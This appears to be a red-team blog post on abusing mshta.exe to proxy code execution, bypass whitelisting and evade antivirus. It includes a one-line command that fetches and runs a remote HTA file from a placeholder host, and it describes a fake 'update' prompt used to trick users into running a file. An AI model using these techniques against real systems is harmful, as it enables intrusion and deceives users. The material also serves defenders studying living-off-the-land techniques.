MSHTA

Microsoft HTML Applications

Mshta is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension hta.HTA's are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.

Adversaries can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows Utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.

Files may be executed through an inline script and can also be executed directly from URL's. Mshta.exe can be used to bypass application whitelisting solutions that do not account for it's potential use. Since mshta executes outside of the internet explorer security context, it also bypasses browser security settings.

Some example's of mshta running:

In this demo I execute a VBScript one liner just calling a simple MsgBox prompting that code was executed, but can we go a bit further?. What about using this for enumeration? Or calling a Shell?

Vb Script One-Liner

A shell caught with Metasploits handler

HTA file shell

What about some Social Engineering asking them to install an "update'?. We can modify this more extensively so when they click OK they will be asked to download and execute a file of our choice.

Can we do it on a remote host without downloading to the target machine? MSHTA can also call file from a remote server the syntax is as simple as mshta http://IP/File.hta on this example the HTA file executes Calc.exe.

Calling calc.exe

These are a few of many ways to use mshta to execute code it's just creativity on what it can be used for and how can it help on a red team job, we talked how it can bypass AV's and avoid any mysterious logs, but any experienced Blue Team analyst can tell that it is very weird for mshta to call cmd.exe this is just a way to minimize the footprint.